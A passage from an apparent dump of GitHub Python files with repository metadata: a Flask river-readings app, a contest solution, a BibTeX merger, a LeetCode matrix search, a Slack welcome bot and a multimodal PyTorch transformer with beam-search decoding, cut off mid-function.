dateparser.parse('today').isoformat()\n","repo_name":"SFTEAM/scrapers","sub_path":"scenes/siteFightingDolls.py","file_name":"siteFightingDolls.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"90"} +{"seq_id":"10649147539","text":"import pandas as pd\n\nfrom flask import Flask, cli\nfrom flask_restful import Api\nfrom flask_sqlalchemy import SQLAlchemy\nimport click\nfrom datetime import datetime\n\nfrom app.controllers.indexcontroller import IndexController\nfrom app.controllers.filecontroller import FileController\nfrom app.controllers.readingscontroller import ReadingsController\nfrom app.controllers.datacontroller import DataController\nfrom app.controllers.datatablecontroller import DataTableController\nfrom app.controllers.infocontroller import InfoController\nfrom app.database import db\nfrom app.models.site import Site\nfrom app.models.readings import Readings\n\n\ndef create_app():\n app = Flask(__name__)\n \n api = Api(app)\n api.add_resource(IndexController, '/')\n api.add_resource(FileController, '/')\n api.add_resource(ReadingsController, '/readings/')\n api.add_resource(DataController, '/data')\n api.add_resource(DataTableController, '/datatable')\n api.add_resource(InfoController, '/info')\n\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///../app/mapping.db'\n app.config['SQLALCHEMY_ECHO'] = True\n db.init_app(app)\n\n app.cli.add_command(create_db)\n app.cli.add_command(create_sites)\n app.cli.add_command(create_readings)\n\n return app\n\n@click.command('create_db')\n@cli.with_appcontext\ndef create_db():\n db.create_all()\n\n@click.command('create_sites')\n@click.argument('sitepath')\n@cli.with_appcontext\ndef create_sites(sitepath):\n sites = pd.read_csv(sitepath)\n for i,row in sites.iterrows():\n site = Site(\n site_id = int(sites.loc[i]['site_id']), \n name = sites.loc[i]['name'], \n waterbody = sites.loc[i]['waterbody'])\n db.session.add(site)\n db.session.commit()\n\n@click.command('create_readings')\n@click.argument('readingspath')\n@cli.with_appcontext\ndef create_readings(readingspath):\n readings = pd.read_csv(readingspath)\n readings['date'] = pd.to_datetime(readings.date)\n readings.sort_values('date',inplace=True)\n for i,row in readings.iterrows():\n reading = Readings(\n reading_id = int(readings.loc[i]['reading_id']),\n site_id = int(readings.loc[i]['site_id']),\n date = readings.loc[i]['date'],\n time = readings.loc[i]['time'],\n tempcelsius = readings.loc[i]['tempcelsius'],\n ph = readings.loc[i]['ph'],\n do = readings.loc[i]['do'],\n phosphate = readings.loc[i]['phosphate'],\n conductivity = readings.loc[i]['conductivity'])\n db.session.add(reading)\n db.session.commit()\n\n\n\n# '/Users/sarahbuchhorn/Desktop/chipy/mapping/app/dist/data/sites.csv'\n# '/Users/sarahbuchhorn/Desktop/chipy/mapping/app/dist/data/readings.csv\n\n","repo_name":"scb02010/chicago-river-checkup","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18430357289","text":"\n\ndef read_int():\n return int(input().strip())\n\n\ndef read_ints():\n return list(map(int, input().strip().split(' ')))\n\n\ndef solve():\n N = read_int()\n table = [\n [1 for _ in range(N)] for _ in range(N)\n ]\n if N%2 == 0:\n for i in range(N//2):\n table[i][N-i-1] = table[N-i-1][i] = 0\n else:\n for i in range(N//2):\n table[i][N-i-2] = table[N-i-2][i] = 0\n size = 0\n answer = []\n for i in range(N):\n for j in range(i+1, N):\n if table[i][j]:\n answer.append((i+1, j+1))\n size += 1\n print(size)\n for a in answer:\n print(*a)\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03090/s695736917.py","file_name":"s695736917.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"43522230751","text":"#! /usr/bin/env python3\n'''\nNiema Moshiri 2017\n\nMerge multiple bib files into a single file: merged.bib\n'''\nimport sys\nfrom bibtexparser.bparser import BibTexParser\nfrom bibtexparser.bibdatabase import BibDatabase\nfrom bibtexparser.bwriter import BibTexWriter\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1 or (len(sys.argv) == 2 and sys.argv[1] in {'h','-h','--h','help','-help','--help'}):\n sys.stderr.write(\"USAGE: python printbib.py ...\\n\")\n exit(0)\n if len(sys.argv) == 2:\n sys.stderr.write(\"ERROR: Only 1 file specified\\n\")\n sys.stderr.write(\"USAGE: python printbib.py ...\\n\")\n exit(-1)\n try:\n entrylists = [(f,BibTexParser(open(f).read()).get_entry_list()) for f in sys.argv[1:]] # (file,entrylist) tuples\n except:\n sys.stderr.write(\"ERROR: Failed to read bib files\\n\")\n exit(-1)\n for bibfile,entrylist in entrylists:\n sys.stderr.write(str(len(entrylist)) + \" entries in file \" + bibfile + '\\n')\n entries = {} # store all entry IDs I've seen so far (entries[ID] = file I read it from)\n outlist = []\n f = open('merged.bib','w')\n for bibfile,entrylist in entrylists:\n for entry in entrylist:\n if entry['ID'] in entries:\n sys.stderr.write(\"DUPLICATE: \" + entry['ID'] + \", using entry from \" + entries[entry['ID']] + '\\n')\n else:\n outlist.append(entry)\n entries[entry['ID']] = bibfile\n db = BibDatabase()\n db.entries = outlist\n writer = BibTexWriter()\n print(writer.write(db).encode('utf8'))\n sys.stderr.write(str(len(entries)) + \" entries in output\\n\")\n","repo_name":"niemasd/tools","sub_path":"mergebib.py","file_name":"mergebib.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"90"} +{"seq_id":"25300598376","text":"#\r\n# @lc app=leetcode.cn id=240 lang=python3\r\n#\r\n# [240] 搜索二维矩阵 II\r\n#\r\n\r\n# @lc code=start\r\nclass Solution:\r\n # 本题根据给定矩阵的性质,将行和列的下标初始化为左下角的元素下标\r\n # 然后根据元素值与target的大小向上或向右移动,直到找到target或者\r\n # 下标超出范围。\r\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\r\n if matrix == None or len(matrix) == 0 or len(matrix[0]) == 0:\r\n return False\r\n # 行\r\n row = len(matrix)-1\r\n # 列\r\n col = 0\r\n while row >= 0 and col < len(matrix[0]):\r\n if matrix[row][col] > target:\r\n row -= 1\r\n elif matrix[row][col] < target:\r\n col += 1\r\n else:\r\n return True\r\n return False\r\n# @lc code=end\r\n\r\n","repo_name":"HughTang/Leetcode-Python","sub_path":"Array and Matrix/240.搜索二维矩阵-ii.py","file_name":"240.搜索二维矩阵-ii.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"34855058733","text":"import sys\nimport time\nimport logging\nimport logging.config\nfrom pprint import pformat\n\nimport click\nimport websocket # Depedency of slackclient, needed for exception handling\nfrom slackclient import SlackClient\n\n__author__ = 'Reilly Tucker Siemens'\n__email__ = 'reilly@tuckersiemens.com'\n__version__ = '0.1.0'\n\n\ndef bail(msg_type: str, color: str, text: str) -> str:\n return f\"{click.style(msg_type, fg=color)}: {text}\"\n\n\ndef setup_logging(verbose: int) -> None:\n logging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': \"%(asctime)s [%(levelname)s] %(message)s\",\n 'datefmt': \"[%Y-%m-%d %H:%M:%S %z]\",\n },\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard',\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': logging.INFO if verbose < 1 else logging.DEBUG,\n 'propagate': True,\n },\n 'requests.packages.urllib3': { # Oh, do shut up, requests.\n 'handlers': ['console'],\n 'level': logging.CRITICAL,\n },\n },\n })\n\n\ndef find_channel_id(channel: str, sc: SlackClient) -> str:\n channels_list = sc.api_call(\"channels.list\").get('channels')\n groups_list = sc.api_call(\"groups.list\").get('groups')\n\n if not channels_list and not groups_list:\n sys.exit(bail('fatal', 'red', \"Couldn't enumerate channels/groups\"))\n\n # Is there a better way to search a list of dictionaries? Probably.\n channel_ids = [c['id'] for c in channels_list + groups_list if c['name'] == channel]\n\n if not channel_ids:\n sys.exit(bail('fatal', 'red', f\"Couldn't find #{channel}\"))\n\n return channel_ids[0]\n\n\ndef handle_event(event: dict, channel: str, channel_id: str, message: str,\n sc: SlackClient, logger: logging.Logger) -> None:\n pretty_event = pformat(event)\n logger.debug(f\"Event received:\\n{pretty_event}\")\n\n subtype = event.get('subtype')\n user = event.get('user')\n\n if subtype in ('group_join', 'channel_join') and user:\n\n # We will use the event's channel ID to send a response and refer to\n # users by their display_name in accordance with new guidelines.\n # https://api.slack.com/changelog/2017-09-the-one-about-usernames\n event_channel_id = event.get('channel')\n user_profile = event.get('user_profile')\n username = user_profile.get('display_name')\n user_mention = f\"<@{user}>\"\n message = message.replace('{user}', user_mention)\n\n if event_channel_id == channel_id:\n try:\n sc.rtm_send_message(event_channel_id, message)\n logger.info(f\"Welcomed {username} to #{channel}\")\n except AttributeError:\n logger.error(f\"Couldn't send message to #{channel}\")\n\n\ndef run(sc: SlackClient, channel: str, message: str, retries: int,\n logger: logging.Logger) -> None:\n if sc.rtm_connect():\n logger.info(\"Connected to Slack\")\n\n channel_id = find_channel_id(channel, sc)\n logger.debug(f\"Found channel ID {channel_id} for #{channel}\")\n\n logger.info(f\"Listening for joins in #{channel}\")\n\n retry_count = 0\n backoff = 0.5\n\n while True:\n try:\n # Handle dem events!\n for event in sc.rtm_read():\n handle_event(event, channel, channel_id, message, sc, logger)\n\n # Reset exponential backoff retry strategy every time we\n # successfully loop. Failure would have happened in rtm_read()\n retry_count = 0\n\n time.sleep(0.5)\n\n # This is necessary to handle an error caused by a bug in Slack's\n # Python client. For more information see\n # https://github.com/slackhq/python-slackclient/issues/127\n #\n # The TimeoutError could be more elegantly resolved by making a PR\n # to the websocket-client library and letting them coerce that\n # exception to a WebSocketTimeoutException.\n except (websocket.WebSocketConnectionClosedException, TimeoutError):\n logger.error(\"Lost connection to Slack, reconnecting...\")\n if not sc.rtm_connect():\n logger.info(\"Failed to reconnect to Slack\")\n if retry_count >= retries:\n sys.exit(bail(\n 'fatal',\n 'red',\n \"Too many failed reconnect attempts, shutting down\")\n )\n time.sleep((backoff ** 2) / 4)\n else:\n logger.info(\"Reconnected to Slack\")\n\n retry_count += 1\n\n else:\n sys.exit(bail('fatal', 'red', \"Couldn't connect to Slack\"))\n","repo_name":"reillysiemens/wb2k","sub_path":"layabout.py","file_name":"layabout.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"90"} +{"seq_id":"33687259877","text":"import torch\nimport torch.nn as nn\nimport pytorch_lightning as pl\nimport pace.modules.vision_transformer as vit\n\nfrom transformers.models.bert.modeling_bert import BertConfig, BertEmbeddings\nfrom pace.modules import heads, objectives, pace_utils\nfrom pace.utils import model_state_load\nfrom pace.utils.glossary import acts\nimport math\n\nclass TransformerSS(pl.LightningModule):\n def __init__(self, config):\n super().__init__()\n self.save_hyperparameters()\n\n bert_config = BertConfig(\n vocab_size=config[\"vocab_size\"],\n hidden_size=config[\"hidden_size\"],\n num_hidden_layers=config[\"num_layers\"],\n num_attention_heads=config[\"num_heads\"],\n intermediate_size=config[\"hidden_size\"] * config[\"mlp_ratio\"],\n max_position_embeddings=config[\"max_text_len\"],\n hidden_dropout_prob=config[\"drop_rate\"],\n attention_probs_dropout_prob=config[\"drop_rate\"],\n )\n\n self.text_embeddings = BertEmbeddings(bert_config)\n self.text_embeddings.apply(objectives.init_weights)\n\n self.token_type_embeddings = nn.Embedding(2, config[\"hidden_size\"])\n self.token_type_embeddings.apply(objectives.init_weights)\n\n if self.hparams.config[\"load_path\"] == \"\":\n self.transformer = getattr(vit, self.hparams.config[\"vit\"])(\n pretrained=True, config=self.hparams.config\n )\n else:\n self.transformer = getattr(vit, self.hparams.config[\"vit\"])(\n pretrained=False, config=self.hparams.config\n )\n\n self.pooler = heads.Pooler(config[\"hidden_size\"])\n self.pooler.apply(objectives.init_weights)\n\n if config[\"loss_names\"][\"mlm\"] > 0 or config[\"loss_names\"][\"seq2seq\"] > 0:\n self.mlm_score = heads.MLMHead(bert_config)\n self.mlm_score.apply(objectives.init_weights)\n\n if config[\"loss_names\"][\"itm\"] > 0:\n self.itm_score = heads.ITMHead(config[\"hidden_size\"])\n self.itm_score.apply(objectives.init_weights)\n\n if config[\"loss_names\"][\"mpp\"] > 0:\n self.mpp_score = heads.MPPHead(bert_config)\n self.mpp_score.apply(objectives.init_weights)\n\n # ===================== Downstream ===================== #\n if (\n self.hparams.config[\"load_path\"] != \"\"\n and not self.hparams.config[\"test_only\"]\n ):\n # self.load_from_checkpoint(self.hparams.config[\"load_path\"], map_location=\"cpu\")\n ckpt = torch.load(self.hparams.config[\"load_path\"], map_location=\"cpu\")\n state_dict = ckpt[\"state_dict\"]\n if ckpt[\"state_dict\"]['text_embeddings.position_ids'].shape[1] != self.hparams.config[\"max_text_len\"]:\n state_dict = model_state_load.change_text_maxlen(state_dict, self.hparams.config[\"max_text_len\"])\n if config[\"loss_names\"][\"mlm\"] > 0 and state_dict[\"text_embeddings.word_embeddings.weight\"].shape[0] < self.hparams.config[\"vocab_size\"]:\n state_dict = model_state_load.resize_token_embedding(state_dict , self.hparams.config[\"vocab_size\"])\n # if self.hparams.config[\"need_expert_load\"] == True:\n # state_dict = model_state_load.expert_state_load(state_dict)\n self.load_state_dict(state_dict, strict=False)\n\n hs = self.hparams.config[\"hidden_size\"]\n\n if self.hparams.config[\"loss_names\"][\"irtr\"] > 0:\n self.rank_output = nn.Linear(hs, 1)\n self.rank_output.weight.data = self.itm_score.fc.weight.data[1:, :]\n self.rank_output.bias.data = self.itm_score.fc.bias.data[1:]\n self.margin = 0.2\n for p in self.itm_score.parameters():\n p.requires_grad = False\n\n if self.hparams.config[\"loss_names\"][\"dst\"] > 0:\n self.candidate_value_cache = {}\n self.cross_entropy = nn.CrossEntropyLoss()\n self.dropout = nn.Dropout(config[\"drop_rate\"])\n self.classifier_gate = nn.Linear(hs, 2)\n self.classifier_span = nn.Linear(hs, 3)\n self.classifier_action = nn.Linear(hs, len(acts))\n ## ====init==== ##\n self.classifier_gate.apply(objectives.init_weights)\n self.classifier_span.apply(objectives.init_weights)\n self.classifier_action.apply(objectives.init_weights)\n\n pace_utils.set_metrics(self)\n self.current_tasks = list()\n\n # ===================== load downstream (test_only) ======================\n\n if self.hparams.config[\"load_path\"] != \"\" and self.hparams.config[\"test_only\"]:\n ckpt = torch.load(self.hparams.config[\"load_path\"], map_location=\"cpu\")\n state_dict = ckpt[\"state_dict\"]\n self.load_state_dict(state_dict, strict=False)\n\n def get_extended_attention_mask(self, attention_mask=None):\n if attention_mask.dim() == 2:\n extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)\n elif attention_mask.dim() == 3:\n extended_attention_mask = attention_mask.unsqueeze(1)\n else:\n raise NotImplementedError\n\n return extended_attention_mask\n\n def infer(\n self,\n batch,\n mask_text=False,\n mask_image=False,\n image_token_type_idx=1,\n image_embeds=None,\n image_masks=None,\n ):\n if f\"image_{image_token_type_idx - 1}\" in batch:\n imgkey = f\"image_{image_token_type_idx - 1}\"\n else:\n imgkey = \"image\"\n\n do_mlm = \"_mlm\" if mask_text else \"\"\n text_ids = batch[f\"text_ids{do_mlm}\"]\n text_labels = batch[f\"text_labels{do_mlm}\"]\n text_masks = batch[f\"text_masks\"]\n text_segment_ids = batch[\"text_segment_ids\"] if self.hparams.config[\"use_segment_ids\"] else None\n text_embeds = self.text_embeddings(text_ids,token_type_ids=text_segment_ids)\n discard_image = self.hparams.config[\"discard_image\"]\n\n #TODO 修改mmconv dst相关代码,通过配置discard_image实现图像无关的任务\n # if discard_image:\n # return self.pure_text_infer(text_ids, text_masks, mask_text=False)\n if imgkey not in batch and image_embeds is None and image_masks is None:\n return self.pure_text_infer(text_ids, text_masks, mask_text=False)\n if image_embeds is None and image_masks is None:\n img = batch[imgkey][0] # 上下无关\n\n (image_embeds, image_masks, patch_index, image_labels,) = self.transformer.visual_embed(\n img,\n max_image_len=self.hparams.config[\"max_image_len\"],\n mask_it=mask_image,\n )\n else:\n patch_index, image_labels = (\n None,\n None,\n )\n\n text_embeds, image_embeds = (\n text_embeds + self.token_type_embeddings(torch.zeros_like(text_ids)),\n image_embeds\n + self.token_type_embeddings(\n torch.full_like(image_masks, image_token_type_idx)\n ),\n )\n image_patch_len = image_embeds.shape[1]\n co_embeds = torch.cat([image_embeds,text_embeds], dim=1)\n\n if \"attention_masks\" in batch:\n max_image_cls_len = self.hparams.config[\"max_image_len\"] + 1#add cls token\n co_masks = batch[\"attention_masks\"][:,max_image_cls_len-image_patch_len:,max_image_cls_len-image_patch_len:]\n else:\n co_masks = torch.cat([image_masks,text_masks], dim=1)\n\n if discard_image:\n co_embeds = co_embeds[:,image_patch_len:]\n co_masks = co_masks[:, image_patch_len: , image_patch_len:]\n\n co_masks = self.get_extended_attention_mask(attention_mask=co_masks) \n x = co_embeds\n it_split = text_embeds.shape[1]\n num_layers = len(self.transformer.blocks)\n\n #TODO 纯文本的路由\n for i, blk in enumerate(self.transformer.blocks):\n #按任务划分\n if self.hparams.config[\"loss_names\"][\"seq2seq\"] > 0:\n if i < (num_layers-3):\n x, _attn = blk(x , mask=co_masks , expert_flag=0 ,it_split=it_split)\n else:\n x, _attn = blk(x , mask=co_masks , expert_flag=4 ,it_split=it_split)\n else:\n if i < (num_layers-3):\n x, _attn = blk(x, mask=co_masks, expert_flag=3, it_split=it_split)\n else:\n x, _attn = blk(x, mask=co_masks, expert_flag=2, it_split=None)\n\n x = self.transformer.norm(x)\n image_feats, text_feats = (\n x[:, : -text_embeds.shape[1]],\n x[:, -text_embeds.shape[1] :],\n )\n cls_feats = self.pooler(text_feats)\n\n ret = {\n \"text_feats\": text_feats,\n \"image_feats\": image_feats,\n \"cls_feats\": cls_feats,\n \"raw_cls_feats\": text_feats[:, 0],\n \"image_labels\": image_labels,\n \"image_masks\": image_masks,\n \"text_labels\": text_labels,\n \"text_ids\": text_ids,\n \"text_masks\": text_masks,\n \"patch_index\": patch_index,\n }\n\n return ret\n\n def pure_text_infer(self, text_ids, text_masks= None, mask_text=False):\n text_embeds = self.text_embeddings(text_ids)\n if text_masks == None:\n text_masks = torch.ones_like(text_ids).to(self.device)\n text_masks = self.get_extended_attention_mask(text_masks)\n text_embeds = (text_embeds + self.token_type_embeddings(torch.zeros_like(text_ids)))\n it_split = text_embeds.shape[1]\n x = text_embeds\n\n for i, blk in enumerate(self.transformer.blocks):\n x, _attn = blk(x, mask=text_masks, expert_flag=0, it_split=it_split , )\n\n x = self.transformer.norm(x)\n cls_feats = self.pooler(x)\n ret = {\n \"text_feats\": x,\n \"cls_feats\": cls_feats,\n \"text_ids\": text_ids,\n \"text_masks\": text_masks,\n }\n\n return ret\n\n def forward(self, batch):\n ret = dict()\n if len(self.current_tasks) == 0:\n ret.update(self.infer(batch))\n return ret\n\n # Masked Language Modeling\n if \"mlm\" in self.current_tasks:\n ret.update(objectives.compute_mlm(self, batch))\n\n # Masked Patch Prediction\n if \"mpp\" in self.current_tasks:\n ret.update(objectives.compute_mpp(self, batch))\n\n # Image Text Matching\n if \"itm\" in self.current_tasks:\n ret.update(objectives.compute_itm_wpa(self, batch))\n\n # Image Retrieval and Text Retrieval\n if \"irtr\" in self.current_tasks:\n ret.update(objectives.compute_irtr(self, batch))\n \n # MMConv DST\n if \"dst\" in self.current_tasks:\n objectives.set_slot_tokens(self)\n ret.update(objectives.compute_dst(self, batch))\n \n if \"intent\" in self.current_tasks:\n ret.update(objectives.compute_itm_intent(self, batch))\n \n # Text generation\n if \"seq2seq\" in self.current_tasks:\n ret.update(objectives.compute_seq2seq(self, batch))\n\n return ret\n\n def training_step(self, batch, batch_idx):\n pace_utils.set_task(self)\n output = self(batch)\n total_loss = sum([v for k, v in output.items() if \"loss\" in k])\n\n return total_loss\n\n def training_epoch_end(self, outs):\n pace_utils.epoch_wrapup(self)\n\n def validation_step(self, batch, batch_idx):\n pace_utils.set_task(self)\n output = self(batch)\n ret = dict()\n if self.hparams.config[\"loss_names\"][\"intent\"] > 0:\n ret[\"intent_logits\"] = output[\"intent_logits\"]\n ret[\"intent_labels\"] = output[\"intent_labels\"]\n return ret\n\n def validation_epoch_end(self, outs):\n if self.hparams.config[\"loss_names\"][\"intent\"] > 0:\n objectives.intent_test_wrapup(outs)\n pace_utils.epoch_wrapup(self)\n\n def test_step(self, batch, batch_idx):\n pace_utils.set_task(self)\n output = self(batch)\n ret = dict()\n\n if self.hparams.config[\"loss_names\"][\"intent\"] > 0:\n ret[\"intent_logits\"] = output[\"intent_logits\"]\n ret[\"intent_labels\"] = output[\"intent_labels\"]\n return ret\n\n def test_epoch_end(self, outs):\n model_name = self.hparams.config[\"load_path\"].split(\"/\")[-1][:-5]\n\n if self.hparams.config[\"loss_names\"][\"intent\"] > 0:\n objectives.intent_test_wrapup(outs)\n if self.hparams.config[\"loss_names\"][\"seq2seq\"] > 0:\n objectives.generation_test_wrapup(self)\n pace_utils.epoch_wrapup(self)\n\n def configure_optimizers(self):\n return pace_utils.set_schedule(self)\n\n\n'''\n decode part,\n adapt some code from unilm\n'''\nclass TransformerSSDecode(TransformerSS):\n def __init__(self,config , mask_word_id = 103 , eos_id=102 , search_beam_size=10 , ngram_size=3 , \n min_len=0 , length_penalty=1.0 , forbid_duplicate_ngrams=False, forbid_ignore_set=None):\n self.mask_word_id = mask_word_id\n self.search_beam_size = search_beam_size\n self.eos_id = eos_id #[SEP]\n self.ngram_size = ngram_size\n self.min_len = min_len\n self.length_penalty = length_penalty\n self.forbid_duplicate_ngrams = forbid_duplicate_ngrams\n self.forbid_ignore_set=forbid_ignore_set\n super().__init__(config)\n\n def encode(self, hidden_states , masks , history_states=None , prev_encoded_layers=None , discard_image=True , text_len=0):\n encoded_layers = []\n num_layers = len(self.transformer.blocks)\n for i, blk in enumerate(self.transformer.blocks):\n if discard_image:\n if i < (num_layers-3):\n hidden_states, _attn = blk(hidden_states, mask=masks, expert_flag=0, it_split=text_len , history_states=history_states)\n else:\n hidden_states, _attn = blk(hidden_states, mask=masks, expert_flag=4, it_split=text_len , history_states=history_states)\n else:\n if i < (num_layers-3):\n hidden_states, _attn = blk(hidden_states, mask=masks, expert_flag=3, it_split=text_len , history_states=history_states)\n else:\n hidden_states, _attn = blk(hidden_states, mask=masks, expert_flag=4, it_split=text_len , history_states=history_states)\n encoded_layers.append(hidden_states)\n \n if prev_encoded_layers is not None:\n history_states = prev_encoded_layers[i]\n hidden_states = self.transformer.norm(hidden_states)\n return hidden_states , encoded_layers\n\n def forward(self , batch , image_token_type_idx=1 , imgkey=\"image\" , decode_prompt=None):\n if self.search_beam_size > 1:\n return self.beam_search(batch , image_token_type_idx , imgkey, decode_prompt)\n device = self.device.type\n text_ids = batch[\"text_ids\"].to(device) #if \"text_ids_mlm\" not in batch else batch[\"text_ids_mlm\"].to(device)\n text_masks = batch[\"text_masks\"].to(device)\n position_ids = batch[\"position_ids\"].to(device)\n use_segment_ids = self.hparams.config[\"use_segment_ids\"]\n segment_ids = batch[\"text_segment_ids\"].to(device) if use_segment_ids else None\n # text_embeds = self.text_embeddings(text_ids , token_type_ids=segment_ids)\n\n img = batch[imgkey][0].to(device)\n (\n image_embeds,\n image_masks,\n patch_index,\n image_labels,\n ) = self.transformer.visual_embed(\n img,\n max_image_len=self.hparams.config[\"max_image_len\"],\n mask_it=False,\n )\n\n image_embeds = image_embeds + self.token_type_embeddings(\n torch.full_like(image_masks, image_token_type_idx)\n )\n \n image_patch_len = image_embeds.shape[1]\n max_image_cls_len = self.hparams.config['max_image_len'] + 1\n #如果包含attention_mask , 那么使用attention_mask\n if \"attention_masks\" in batch:\n co_masks = batch[\"attention_masks\"][:,max_image_cls_len-image_patch_len:,max_image_cls_len-image_patch_len:]\n else:\n co_masks = torch.cat([image_masks, text_masks], dim=1)\n\n co_masks = self.get_extended_attention_mask(attention_mask=co_masks).to(device)\n \n if decode_prompt != None:\n prompt = torch.tensor(decode_prompt).repeat(text_ids.shape[0], 1).to(device)\n text_ids = torch.cat((text_ids , prompt), dim=1)\n output_ids = []\n batch_size = text_ids.shape[0]\n input_length = text_ids.shape[1]\n\n next_pos = input_length\n max_length = self.hparams.config[\"max_text_len\"]\n if self.hparams.config[\"max_pred_len\"] >0 :\n max_length = min(max_length,input_length + self.hparams.config[\"max_pred_len\"])\n \n curr_ids = text_ids\n cur_ids = text_ids\n mask_ids = text_ids.new(batch_size,1).fill_(self.mask_word_id)\n\n discard_image = self.hparams.config['discard_image']\n prev_embeddings = None\n prev_encoded_layers = None\n while next_pos < max_length:\n curr_length = list(curr_ids.size())[1]\n start_pos = next_pos - curr_length\n x_input_ids = torch.cat((cur_ids , mask_ids) , dim=1)\n text_len = x_input_ids.shape[1]\n curr_text_embeds = self.text_embeddings(input_ids=x_input_ids , position_ids=position_ids[: ,:x_input_ids.shape[1]] , \n token_type_ids=segment_ids[:,:x_input_ids.shape[1]] if use_segment_ids else None) + self.token_type_embeddings(torch.zeros_like(x_input_ids))\n\n if prev_embeddings is None:\n curr_embeds = torch.cat([image_embeds,curr_text_embeds], dim=1)\n curr_attention_mask = co_masks[:, :,\n :image_patch_len+next_pos+1,:image_patch_len+next_pos+1]\n else:\n curr_embeds = curr_text_embeds[:,-2:]\n curr_attention_mask = co_masks[:, :,\n image_patch_len+start_pos:image_patch_len+next_pos+1,:image_patch_len+next_pos+1] \n if discard_image:\n if prev_embeddings is None:\n curr_embeds = curr_embeds[:,image_patch_len:]\n curr_attention_mask = curr_attention_mask[:,:, \n image_patch_len: , image_patch_len:]\n else:\n curr_attention_mask = curr_attention_mask[:,:,\n :,image_patch_len:]\n new_hidden_states , new_encoded_layers = self.encode(curr_embeds , curr_attention_mask , history_states=prev_embeddings , prev_encoded_layers=prev_encoded_layers , discard_image=discard_image , text_len=text_len)\n last_feats = new_hidden_states[:,-1:, :]\n prediction_scores = self.mlm_score(last_feats)\n _ , max_ids = torch.max(prediction_scores ,dim=-1)\n output_ids.append(max_ids)\n\n if prev_embeddings is None:\n prev_embeddings = curr_embeds[:, :-1 ,:]\n else:\n prev_embeddings = torch.cat(\n (prev_embeddings , curr_embeds[:, :-1 ,:]) , dim=1)\n \n if prev_encoded_layers is None:\n prev_encoded_layers = [layer[:, :-1 , :] for layer in new_encoded_layers]\n else:\n prev_encoded_layers = [torch.cat((xx[0] , xx[1][:, :-1 ,:]) , dim=1)\n for xx in zip(prev_encoded_layers , new_encoded_layers)]\n curr_ids = max_ids \n cur_ids = torch.cat((cur_ids , max_ids), dim=1)\n next_pos += 1\n\n ret = {\"pred_seq\":torch.cat(output_ids , dim=1)}\n return ret\n\n def beam_search(self, batch , image_token_type_idx=1 , imgkey=\"image\" , decode_prompt=None):\n device = self.device.type\n text_ids = batch[\"text_ids\"].to(device)\n text_masks = batch[\"text_masks\"].to(device)\n position_ids = batch[\"position_ids\"].to(device)\n use_segment_ids = self.hparams.config[\"use_segment_ids\"]\n segment_ids = batch[\"text_segment_ids\"].to(device) if use_segment_ids else None\n\n img = batch[imgkey][0].to(device) \n (\n image_embeds,\n image_masks,\n patch_index,\n image_labels,\n ) = self.transformer.visual_embed(\n img,\n max_image_len=self.hparams.config[\"max_image_len\"],\n mask_it=False,\n )\n image_embeds = image_embeds + self.token_type_embeddings(torch.full_like(image_masks , image_token_type_idx))\n max_image_cls_len = self.hparams.config['max_image_len'] + 1\n image_patch_len = image_embeds.shape[1]\n #如果包含attention_mask , 那么使用attention_mask\n if \"attention_masks\" in batch:\n co_masks = batch[\"attention_masks\"][:,max_image_cls_len-image_patch_len:,max_image_cls_len-image_patch_len:]\n else:\n co_masks = torch.cat([image_masks, text_masks], dim=1)\n\n co_masks = self.get_extended_attention_mask(attention_mask=co_masks).to(device)\n\n if decode_prompt != None:\n prompt = torch.tensor(decode_prompt).repeat(text_ids.shape[0], 1).to(device)\n text_ids = torch.cat((text_ids , prompt), dim=1)\n\n input_shape = list(text_ids.size())\n batch_size = input_shape[0]\n input_length = input_shape[1]\n\n output_ids = []\n prev_embedding = None\n prev_encoded_layers = None\n curr_ids = text_ids\n cur_ids = text_ids\n mask_ids = text_ids.new(batch_size, 1).fill_(self.mask_word_id)\n next_pos = input_length\n K = self.search_beam_size\n total_scores = []\n beam_masks = []\n step_ids = []\n step_back_ptrs = []\n partial_seqs = []\n forbid_word_mask = None\n buf_matrix = None\n is_first = True\n max_length = self.hparams.config[\"max_text_len\"]\n if self.hparams.config[\"max_pred_len\"] >0 :\n max_length = min(max_length,input_length + self.hparams.config[\"max_pred_len\"])\n \n discard_image = self.hparams.config[\"discard_image\"]\n while next_pos < max_length:\n curr_length = list(curr_ids.size())[1]\n\n start_pos = next_pos - curr_length\n x_input_ids = torch.cat((cur_ids, mask_ids), dim=1)\n text_len = x_input_ids.shape[1]\n curr_text_embeds = self.text_embeddings(input_ids=x_input_ids , position_ids=position_ids[: ,:x_input_ids.shape[1]] , \n token_type_ids=segment_ids[:,:x_input_ids.shape[1]] if use_segment_ids else None) + self.token_type_embeddings(torch.zeros_like(x_input_ids))\n\n if prev_embedding is None:\n curr_embeds = torch.cat([image_embeds,curr_text_embeds], dim=1)\n curr_attention_mask = co_masks[:, :,\n :image_patch_len+next_pos+1,:image_patch_len+next_pos+1]\n else:\n curr_embeds = curr_text_embeds[:,-2:]\n curr_attention_mask = co_masks[:, :,\n image_patch_len+start_pos:image_patch_len+next_pos+1,:image_patch_len+next_pos+1]\n if discard_image:\n if prev_embedding is None:\n curr_embeds = curr_embeds[:, image_patch_len:]\n curr_attention_mask = curr_attention_mask[:, :, \n 